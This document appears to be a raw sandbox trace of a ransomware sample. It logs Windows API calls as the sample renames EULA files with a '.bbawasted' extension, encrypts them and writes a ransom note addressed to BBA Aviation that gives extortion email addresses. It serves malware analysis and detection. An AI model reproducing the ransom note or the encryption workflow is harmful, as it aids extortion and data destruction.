lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0235.690] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.690] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a68a0) returned 1 [0235.690] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0235.690] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0235.690] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-mx.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-mx.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0235.692] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0235.693] SetEndOfFile (hFile=0x28c) returned 1 [0235.693] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.693] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.693] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0235.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-mx.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-mx.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-mx.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-mx.htm.bbawasted")) returned 1 [0235.695] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-mx.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-mx.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0235.695] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0235.695] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x110b8 [0235.695] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x110b8) returned 0x5f0000 [0235.695] CloseHandle (hObject=0x27c) returned 1 [0235.700] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0235.701] CloseHandle (hObject=0x280) returned 1 [0235.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aabf8 [0235.701] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6680) returned 1 [0235.702] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x6aac40 | out: pbBuffer=0x6aac40) returned 1 [0235.702] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0235.702] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5f98) returned 1 [0235.704] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0235.704] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0235.848] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0235.849] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aabf8 | out: hHeap=0x660000) returned 1 [0235.849] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.849] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]M2Umi4ntAArJvZIfZlfwa6lKK8iVFDqjg68r8ew8Aiv+O+WuakC9meNfk0gGs2yb\r\nI6n1tJbSqTv1pKhxri8+Jgy+eNu8TaKFm7S8aaCOefi2aUQdBfJaqVGDTyGqmAgA\r\nt59d3bdsirYZjjKxOaIzpMPrO6cxISUDw5ZlzinrXyUv0IasKqidu/A3vTTYlnWs\r\nETh7Zfec1TJY6I3bJ1wmRvTU6dThDCSEe2lbKHbKHIEf4B73QvZTELqA/Po93pr+\r\nT6ObzVb2aNQ4HrJz3HK7VO7PhPL8PNkHX8jcCz5YJCgOKMjI4Z2B+bWjXeE/Z7eJ\r\neeRks4mctcS/m7EZx/rpvWlsAkuYYcLUfoGuMtLsmtwyU8JYwrFBLbny52Vjp6qQ\r\ne+OAAK4XhJTa1z4VXxfEwtAaxHiDiGr273tFQE9u6DXCMFrhrQ05nSeUBpZnjRCJ\r\nN5eD+Uu69L8wdzWu1nPcF31J735kDPpJNffoQ4L+MrePShvtfH58dknbUIUF/78b\r\nlo/edo5981iRjN9qP/qP58MNBAamgf50uR3sfUCgQb475fumZpk6SsnCJ5i8te9f\r\nKzkO1eivJk14mI/3+sGfy///7BtvXb7LhYlMB+kwKHTnCwQaupNdVNxy3aPy5ipJ\r\nJX2yjT3Udotcla6dNaZbYPJfvJZtu7DGyHhkJmJzefd=[end_key]\r\nKEEP IT\r\n") returned 984 [0235.849] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0235.849] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0235.849] SetEndOfFile (hFile=0x28c) returned 1 [0235.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.852] CloseHandle (hObject=0x28c) returned 1 [0235.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0235.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c1b18 | out: hHeap=0x660000) returned 1 [0235.852] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6240) returned 1 [0235.853] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0235.853] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0235.853] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fi-fi.htm") returned 56 [0235.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0235.854] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0235.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.854] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a63d8) returned 1 [0235.854] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0235.854] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0235.854] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fi-fi.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fi-fi.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0235.856] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0235.857] SetEndOfFile (hFile=0x28c) returned 1 [0235.857] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.857] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0235.857] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fi-fi.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fi-fi.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fi-fi.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fi-fi.htm.bbawasted")) returned 1 [0235.859] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fi-fi.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fi-fi.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0235.859] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0235.860] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x1145a [0235.860] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1145a) returned 0x5f0000 [0235.860] CloseHandle (hObject=0x27c) returned 1 [0235.864] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0235.865] CloseHandle (hObject=0x280) returned 1 [0235.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6a9fc8 [0235.865] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6460) returned 1 [0235.866] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x1b8, pbBuffer=0x6aa010 | out: pbBuffer=0x6aa010) returned 1 [0235.866] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0235.866] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5f98) returned 1 [0235.867] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0235.867] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0235.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0235.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9fc8 | out: hHeap=0x660000) returned 1 [0235.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.965] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]l5a7mvZVsgV+AGxT1l+INfwvYKV0IpArmMOpK6KC3EN3Sahadc8Ba4GXyP174KXk\r\nb6OfndEoYxh2xBigNvnPCn1V8fMEd9/F6RMXGpjkEQ2gMdZwAmk31FKR1EamL/Qp\r\noBDIVahGh798SBtQqaKr6RTVoCHJ+/I0I/o2fdxDOE6hp/LpnVe/Mvn7+lf7bkIJ\r\nrKcbfG5t81laKEbeZPhhw01u92PGDA6SxhKRB9prRyrh0WAgeTlXpOT9bpEcHqE7\r\ncGOcp6selBz9/lPXKIfwQDHFRrA7e44OeQjTHXtscqwrOp4IfIQRRGEtRru1doJt\r\nVC9E7yMzaOZz//GgCep+2LnPZWjUgDIoj7o2QfN6HlNhHgLzfAKZwegU2JVzWXqV\r\ncnx+LC8xyLa+nrQ/wug0CJa2apHUnALq0NawBLQqrujwrSqF7MSeKO9dM5qqPsla\r\nqIU6dCrkvjW3mJcVKWg6kVI8NiVZ3j2cyKOlaUQvRUl2Iy3ZamqqpFqgAlJZxmZx\r\nsBbDrAlWebren/ViN5e7Qhdt9kFkvgcbbb60HQlfgu2QbXBng/0+2jm8miRU2eKO\r\niNhfID4rRloWEA2lh7ESxpw0gkXDv9IV0aR16GCKdsCNsrK5Vs+lrByfY1YT2nsy\r\nCNSWffAo7wv6q7p4ZyiFDSQ8yI31lo4p3He3q2R3mYV=[end_key]\r\nKEEP IT\r\n") returned 984 [0235.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0235.965] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0235.965] SetEndOfFile (hFile=0x28c) returned 1 [0235.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.968] CloseHandle (hObject=0x28c) returned 1 [0235.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0235.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c1d88 | out: hHeap=0x660000) returned 1 [0235.969] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a65f8) returned 1 [0235.970] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0235.970] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0235.970] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-ca.htm") returned 56 [0235.970] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0235.970] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0235.970] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.970] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5f10) returned 1 [0235.971] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0235.971] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0235.971] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-ca.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-ca.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0235.972] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0235.973] SetEndOfFile (hFile=0x28c) returned 1 [0235.973] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.973] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.973] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0235.973] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-ca.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-ca.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-ca.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-ca.htm.bbawasted")) returned 1 [0235.974] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-ca.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-ca.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0235.975] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0235.975] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x10f0a [0235.975] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10f0a) returned 0x5f0000 [0235.975] CloseHandle (hObject=0x280) returned 1 [0236.064] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0236.065] CloseHandle (hObject=0x27c) returned 1 [0236.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa7e8 [0236.065] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a63d8) returned 1 [0236.066] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x1b8, pbBuffer=0x6aa830 | out: pbBuffer=0x6aa830) returned 1 [0236.066] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0236.066] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a65f8) returned 1 [0236.067] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0236.067] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0236.081] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0236.081] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa7e8 | out: hHeap=0x660000) returned 1 [0236.081] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0236.081] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]HG1p/C5O2+AvzNKAoT4p5VO1yaPKWPK/uxI3Rqsk/10hObcn0Gp+OmKtYVlaTnSG\r\nB9QI1wZPd0oNSf4B0Hx43zIkasN6ZKI/w9urcPJAI0x6kZmkfk3BwwElXsifaTN3\r\nFZR/T5UJbIZQCPHaZgqvaEprZ3Ouj60ChvIh+zWy+P3avtpbI7FCe5yvXGp9w1is\r\nxkK+H3lbKf9gficPEpUUBon6cPWKCNUvnhccO1s4Fn0RwY32W5gAh6xsRPfJgu5F\r\ngERuUSjehii16WMbZxqXux0PF5ktc4DVNtEvGvCNHC6CQmdN/pu3uz9jmwD5jwrl\r\n5M15fgRl97kgXcWxxcMaXHeqlc/9KvV5MZ7xdg5qwdS5Qpdb3Rk7hI0i8hT4+lfn\r\naRsdNggTH/EjklH3E22W7gaenNh1HbnyQOhh+XwGnfH1oa1kt9BXU7des1PJpjgV\r\n8belalsoPWU1pi+kBIE20IvLvpjoZewoi4mQTJdOUhFNXiBFK/eLc4Os65tbr4bf\r\narziIu4gaJwYXlMoygUGXnvISR95JO33lQ8OAevlrJz9ZGAZdYUT7avNxiCCuQC+\r\nj6PFwtU2msglHVVrB0BVqroKy/M7fOQBWcZf9vIEy2Z418fe9AQGbJviuzobGJhT\r\n1z40C8+f8e/s2AwQMiXQYb+0GMO8j7sg6Z/4+P+FAYy=[end_key]\r\nKEEP IT\r\n") returned 984 [0236.081] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0236.081] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0236.081] SetEndOfFile (hFile=0x28c) returned 1 [0236.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0236.084] CloseHandle (hObject=0x28c) returned 1 [0236.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0236.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c0ee8 | out: hHeap=0x660000) returned 1 [0236.084] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6570) returned 1 [0236.085] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0236.085] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0236.085] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_he-il.htm") returned 56 [0236.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0236.085] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0236.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0236.085] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a61b8) returned 1 [0236.086] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0236.086] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0236.086] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_he-il.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_he-il.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0236.086] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0236.087] SetEndOfFile (hFile=0x28c) returned 1 [0236.088] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0236.088] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0236.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_he-il.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_he-il.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_he-il.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_he-il.htm.bbawasted")) returned 1 [0236.089] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_he-il.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_he-il.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0236.089] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 